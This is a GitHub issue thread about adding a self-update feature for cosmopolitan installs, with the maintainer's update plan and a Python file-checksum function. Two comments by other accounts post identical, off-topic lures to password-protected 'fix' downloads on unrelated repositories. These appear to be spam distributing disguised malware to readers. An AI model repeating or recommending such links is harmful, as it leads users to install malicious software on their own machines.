### ISSUE TITLE
add: `--self-update` for cosmopolitan installs

### ISSUE THREAD

**Issue by metaist** [metaist/ds#88]
I'd want to see how far I could get with just the built-in python calls before jumping ship and using requests.

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by metaist** [comment]
I'd have to:
- check if this was a cosmopolitan install (touch some file before zipping)
- check if there was an updated version
- download the file to a temp directory
- compute checksum
- `chmod +x`
- move to current location

Could put version number + checksum as a release asset `.json` so I can fetch both. I should see what `uv` does for receipts.

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by metaist** [comment]
```python
import hashlib
def compute_file_hash(file_path, hash_function='sha256'):
    hash_func = getattr(hashlib, hash_function)()
    with open(file_path, 'rb') as f:
        for chunk in iter(lambda: f.read(4096), b""):
            hash_func.update(chunk)
    return hash_func.hexdigest()
```
